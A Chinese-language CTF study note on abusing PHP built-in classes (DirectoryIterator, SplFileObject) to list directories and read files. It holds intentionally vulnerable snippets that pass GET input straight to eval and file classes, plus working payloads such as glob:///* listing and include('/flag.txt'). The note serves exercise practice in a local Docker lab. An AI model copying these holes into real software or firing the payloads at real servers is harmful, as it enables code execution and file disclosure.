目录

DirectoryIterator

SplFileInfo

---

DirectoryIterator

适用：PHP 5, PHP 7, PHP 8

__toString()方法可以获取字符串形式的文件名

<?php
highlight_file(__file__);
$dir = $_GET['dir'];
$a = new DirectoryIterator($dir);
foreach($a as $f){
    echo($f->__toString().'<br>');
}
?>
?dir=./
?dir=glob://../*.lnk

练习 

<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_GET['c'])){
        $c= $_GET['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>

这里在docker搭个环境 

docker run -d -p 90:80 --name my_php php:7.4.3-apache

docker  start my_php

docker exec -it my_php /bin/bash

apt-get update

apt-get install vi

payload

c=$a = new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'<br>');}exit();
c=include('/flag.txt');exit(); 

 

 

 

SplFileInfo

适用：PHP 5 >= 5.1.2, PHP 7, PHP 8

SplFileInfo::__toString — Returns the path to the file as a string //将文件路径作为字符串返回

<?php
highlight_file(__file__);
$_file=$_GET['file'];
$context = new SplFileObject($_file);
foreach($context as $f){
    echo($f);
}
file=C:\Users\admin\Desktop\PHP\flag.txt
file=./flag.txt